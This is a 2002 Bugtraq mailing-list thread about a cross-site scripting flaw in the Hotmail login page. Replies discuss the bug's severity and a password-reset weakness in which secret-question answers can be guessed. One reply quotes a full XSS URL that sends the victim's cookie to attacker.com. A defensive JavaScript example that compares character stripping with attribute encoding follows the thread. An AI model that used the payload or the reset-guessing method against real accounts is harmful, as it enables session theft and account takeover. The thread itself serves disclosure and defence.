Bugtraq mailing list archives

Re: XSS bug in hotmail login page


From: "Inderjeet S Sodhi" <adaimages () hotmail com>
Date: Wed, 9 Oct 2002 21:03:32 +0530

Hi Everyone,
MSN passport (read Microsoft)'s basic mentality itself about security is
very insecure. In November 2001 and April 2002, when some security bugs were
mentioned, MSN did patch some of their systems. But surprisingly, we found
many of the systems still used the buggy techniques, say, Javascript, within
their own pages. Even today, when one opens MSN Hotmail in IE6, it many
times says Script Error (or something similar). Can't they make their own
mail system compatible with their own Browser?

Other issues we observed but kept silent were:
a) When MS transitioned from MS hotmail to MSN hotmail, they reset all
users' options to somewhat insecure settings. I am unaware if any warning or
alert was sent before doing so. The settings affected were (still are, and
maybe are default settings for new accounts):

            (Under Personal Profile...)
                1. Share my e-mail address.
                2. Share my first and last names.
                3. Share my other registration information.
                        The above three options are enabled by default. I
assume that these may be a prime source of leaking information to spammers,
besides other security risks. If you have these options enabled, Disable
them NOW!

              (Under Other Options...)
                4. Session Expiration is set to NEVER. Probably, if session
expiration is set to the minimum available 2 hours, chances of others getting
into your hotmail accounts become less.

B) The change password policy: Hotmail's Reset Password option can be used by
any user, as long as the account holder is not in the US, that is, his/her
location is not set at US. This is because when the "forgot password" option
is invoked (and a secret question is present in the database), the next step
asks for the username and country. If the country is not US, then a third
field, ZIP CODE, is skipped and the secret question page is shown. Of course
one has to know the answer to the question but then, MS has provided enough
freedom to users to type in any question they like. During our research, we
found questions like "How are you?" and "Whom do you love most?". Anyone's
guess, we found answers to be like "Fine" (or "Bad" or "Not Good") and "me"
(or "myself" or "my lover") respectively. The answers in brackets are the
next-possible-answers but we could guess, at the most, in the second attempt
only.

Time to change hotmail policies??

With warm regards and best wishes.

Inderjeet S Sodhi
Infotech Consultant, E-Security and S/W Solution Provider,
Web Designer and Beta Tester.


----- Original Message -----
From: "Russell Harding" <hardingr () cunap com>
To: "Thor Larholm" <Thor () jubii dk>
Sent: Tuesday, October 08, 2002 12:20 PM
Subject: RE: XSS bug in hotmail login page


Hello, comments below:

On Mon, 7 Oct 2002, Thor Larholm wrote:

It's very simple, you can inject arbitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.


  I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests.  While you can view your own cookies easily, I'm not
sure if you can still exploit this bug.  I do know filtering these
characters prevents this sort of attack:


http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang=

Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?

       -Russell

P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without "+" or "%2B"?



On Mon, 7 Oct 2002, Thor Larholm wrote:

From: Peter Rdam [mailto:hell () weedmail com]
They didn't react, and I'm pretty curious about what
is possible with the bug. And I actually hope that
someone can tell me about it and maybe Microsoft will
do something about it.

It's very simple, you can inject arbitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.



Regards
Thor Larholm
Jubii A/S - Internet Programmer
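Russell's message above discusses stripping "+" and "%2B" from requests as the defence against the quoted login-page XSS. The following is an added example, not code from the thread or from Hotmail: a constructed stand-in template reflects the cb parameter into a quoted attribute, and a small check compares that character blacklist with HTML attribute encoding (the function names, the template and the sample value are all assumptions).

```javascript
// Added example, not from the thread or from Hotmail: a constructed
// login-form template that reflects the "cb" query parameter into a quoted
// attribute, rendered once with the "+"/"%2B" stripping described in the
// thread and once with HTML attribute encoding.

// Constructed sample input, shaped like the cb= value quoted in the thread
// but with a harmless script body.
const SAMPLE_CB = '";><script>test()</script>';

// Blacklist approach discussed in the thread: remove "+" and "%2B" only.
function stripPlus(value) {
  return value.replace(/%2B/gi, "").replace(/\+/g, "");
}

// Output encoding: every character that can close the attribute or open a
// tag becomes an entity, so the value can only ever be attribute text.
function encodeForHtmlAttribute(value) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return value.replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Hypothetical template standing in for the login page (not Hotmail's HTML).
function renderLoginPage(cb, transform) {
  return `<input type="hidden" name="cb" value="${transform(cb)}">`;
}

// Review check: the template emits exactly one tag, so any additional "<"
// in the output means the parameter broke out of the attribute.
function isSafeRendering(html) {
  const tagOpens = (html.match(/</g) || []).length;
  return tagOpens === 1 && !/<script/i.test(html);
}

// Compare both defences on the sample; returns the two verdicts.
function compareDefences(cb = SAMPLE_CB) {
  return {
    stripped: isSafeRendering(renderLoginPage(cb, stripPlus)),
    encoded: isSafeRendering(renderLoginPage(cb, encodeForHtmlAttribute)),
  };
}

console.log(compareDefences()); // { stripped: false, encoded: true }
```

Encoding also leaves legitimate values such as "a+b" intact, whereas the blacklist silently mangles them.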




